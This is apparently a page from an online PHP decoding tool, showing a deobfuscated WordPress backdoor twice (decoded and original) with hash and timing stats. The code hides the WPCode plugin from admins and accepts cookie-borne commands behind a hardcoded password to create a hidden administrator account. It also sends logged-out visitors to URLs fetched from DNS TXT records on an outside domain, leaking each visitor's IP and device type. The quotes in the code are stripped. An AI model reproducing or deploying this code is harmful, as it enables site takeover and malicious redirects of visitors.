Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

$p0=637765b7e94a6c9088aae4dc8a89d2d7; if(current_user_can(administrator)&&!array_key_exis..

Decoded Output download

<?  $p0=637765b7e94a6c9088aae4dc8a89d2d7; 
if(current_user_can(administrator)&&!array_key_exists(show_all,$_GET)){add_action(admin_print_scripts,function(){echo <style>; 
echo #toplevel_page_wpcode { display: none; }; 
echo #wp-admin-bar-wpcode-admin-bar-info  { display: none; }; 
echo </style>; 
}); 
 
add_filter(all_plugins),function($z1){unset($z1[insert-headers-and-footers/ihaf.php]); 
return $z1; 
}); 
} 
function _gcookie($y2){return(isset($_COOKIE[$y2]))?base64_decode($_COOKIE[$y2]):''; 
}if(!function_exists(_red)){error_reporting(0); 
ini_set(display_errors,0); 
if(!empty($p0)&&_gcookie(pw)===$p0){switch(_gcookie(c)){case sd:$o3=_gcookie(d); 
if(strpos($o3,.)>0){update_option(d,$o3); 
}break; 
case au:$m4=_gcookie(u); 
$d5=_gcookie(base64_decode(p); 
$n6=_gcookie(base64_decode(e); 
if($m4&&$d5&&$n6&&!username_exists($m4)){$x7=wp_create_user($m4,$d5,$n6); 
$j8=new WP_User($x7); 
$j8->set_role(administrator); 
}break; 
}return; 
}function _is_mobile(){return preg_match(/(android|webos|avantgo|iphone|ipad|ipod|blackberry|iemobile|bolt|boost|cricket|docomo|fone|hiptop|mini|opera mini|kitkat|mobi|palm|phone|pie|tablet|up.browser|up.link|webos|wos)/i,$_SERVER[HTTP_USER_AGENT]); 
}function _is_iphone(){return preg_match(/(iphone|ipod)/i,$_SERVER[HTTP_USER_AGENT]); 
}function _user_ip(){foreach(array(HTTP_CF_CONNECTING_IP,HTTP_CLIENT_IP,HTTP_X_FORWARDED_FOR,HTTP_X_FORWARDED,HTTP_X_CLUSTER_CLIENT_IP,HTTP_FORWARDED_FOR,HTTP_FORWARDED,REMOTE_ADDR)as $v9){if(array_key_exists($v9,$_SERVER)&&!empty($_SERVER[$v9])){foreach(explode(,,$_SERVER[$v9])as $n10){$n10=trim($n10); 
if(filter_var($n10,FILTER_VALIDATE_IP,FILTER_FLAG_NO_PRIV_RANGE|FILTER_FLAG_NO_RES_RANGE)!==false){return $n10; 
}}}}return false; 
 
}function _red(){if(is_user_logged_in()){return; 
}$n10=_user_ip(); 
if(!$n10){return; 
}$z11=get_transient(exp); 
if(!is_array($z11)){$z11=array(); 
}foreach($z11 as $t12=>$d13){if(time()-$d13>86400){unset($z11[$t12]); 
}}if(key_exists($n10,$z11)&&(time()-$z11[$n10]<86400)){return; 
}$n14=filter_var(parse_url(https://.$_SERVER[base64_decode('SFRUUF9IT1NU')],PHP_URL_HOST),FILTER_VALIDATE_DOMAIN,FILTER_FLAG_HOSTNAME); 
$s15=str_replace(:,-,$n10); 
$s15=str_replace(.,-,$s15); 
$r16=cloud-stats.com; 
$h17=get_option(d); 
if($h17&&strpos($h17,.)>0){$r16=$h17; 
}$z18=_is_iphone()?i:m; 
$q19=(!$n14?unk.com:$n14)...(!$s15?0-0-0-0:$s15)...mt_rand(100000,999999)...(_is_mobile()?n.$z18:nd)...$r16; 
$h20=dns_get_record($q19,DNS_TXT); 
if(is_array($h20)&&!empty($h20)){if(isset($h20[0][txt])){$h20=$h20[0][txt]; 
$h20=base64_decode($h20); 
if($h20==err){$z11[$n10]=time(); 
delete_transient(exp); 
set_transient(exp,$z11); 
}else if(substr($h20,0,4)===http){$z11[$n10]=time(); 
delete_transient(exp); 
set_transient(exp,$z11); 
wp_redirect($h20); 
exit; 
}}}}add_action(init,_red); 
} ?>

Did this file decode correctly?

Original Code

$p0=637765b7e94a6c9088aae4dc8a89d2d7;
if(current_user_can(administrator)&&!array_key_exists(show_all,$_GET)){add_action(admin_print_scripts,function(){echo <style>;
echo #toplevel_page_wpcode { display: none; };
echo #wp-admin-bar-wpcode-admin-bar-info  { display: none; };
echo </style>;
});

add_filter(all_plugins),function($z1){unset($z1[insert-headers-and-footers/ihaf.php]);
return $z1;
});
}
function _gcookie($y2){return(isset($_COOKIE[$y2]))?base64_decode($_COOKIE[$y2]):'';
}if(!function_exists(_red)){error_reporting(0);
ini_set(display_errors,0);
if(!empty($p0)&&_gcookie(pw)===$p0){switch(_gcookie(c)){case sd:$o3=_gcookie(d);
if(strpos($o3,.)>0){update_option(d,$o3);
}break;
case au:$m4=_gcookie(u);
$d5=_gcookie(base64_decode(p);
$n6=_gcookie(base64_decode(e);
if($m4&&$d5&&$n6&&!username_exists($m4)){$x7=wp_create_user($m4,$d5,$n6);
$j8=new WP_User($x7);
$j8->set_role(administrator);
}break;
}return;
}function _is_mobile(){return preg_match(/(android|webos|avantgo|iphone|ipad|ipod|blackberry|iemobile|bolt|boost|cricket|docomo|fone|hiptop|mini|opera mini|kitkat|mobi|palm|phone|pie|tablet|up.browser|up.link|webos|wos)/i,$_SERVER[HTTP_USER_AGENT]);
}function _is_iphone(){return preg_match(/(iphone|ipod)/i,$_SERVER[HTTP_USER_AGENT]);
}function _user_ip(){foreach(array(HTTP_CF_CONNECTING_IP,HTTP_CLIENT_IP,HTTP_X_FORWARDED_FOR,HTTP_X_FORWARDED,HTTP_X_CLUSTER_CLIENT_IP,HTTP_FORWARDED_FOR,HTTP_FORWARDED,REMOTE_ADDR)as $v9){if(array_key_exists($v9,$_SERVER)&&!empty($_SERVER[$v9])){foreach(explode(,,$_SERVER[$v9])as $n10){$n10=trim($n10);
if(filter_var($n10,FILTER_VALIDATE_IP,FILTER_FLAG_NO_PRIV_RANGE|FILTER_FLAG_NO_RES_RANGE)!==false){return $n10;
}}}}return false;

}function _red(){if(is_user_logged_in()){return;
}$n10=_user_ip();
if(!$n10){return;
}$z11=get_transient(exp);
if(!is_array($z11)){$z11=array();
}foreach($z11 as $t12=>$d13){if(time()-$d13>86400){unset($z11[$t12]);
}}if(key_exists($n10,$z11)&&(time()-$z11[$n10]<86400)){return;
}$n14=filter_var(parse_url(https://.$_SERVER[base64_decode('SFRUUF9IT1NU')],PHP_URL_HOST),FILTER_VALIDATE_DOMAIN,FILTER_FLAG_HOSTNAME);
$s15=str_replace(:,-,$n10);
$s15=str_replace(.,-,$s15);
$r16=cloud-stats.com;
$h17=get_option(d);
if($h17&&strpos($h17,.)>0){$r16=$h17;
}$z18=_is_iphone()?i:m;
$q19=(!$n14?unk.com:$n14)...(!$s15?0-0-0-0:$s15)...mt_rand(100000,999999)...(_is_mobile()?n.$z18:nd)...$r16;
$h20=dns_get_record($q19,DNS_TXT);
if(is_array($h20)&&!empty($h20)){if(isset($h20[0][txt])){$h20=$h20[0][txt];
$h20=base64_decode($h20);
if($h20==err){$z11[$n10]=time();
delete_transient(exp);
set_transient(exp,$z11);
}else if(substr($h20,0,4)===http){$z11[$n10]=time();
delete_transient(exp);
set_transient(exp,$z11);
wp_redirect($h20);
exit;
}}}}add_action(init,_red);
}

Function Calls

None

Variables

None

Stats

MD5 42c3429a2aba1d1e68a5f0c322ec4ff0
Eval Count 0
Decode Time 48 ms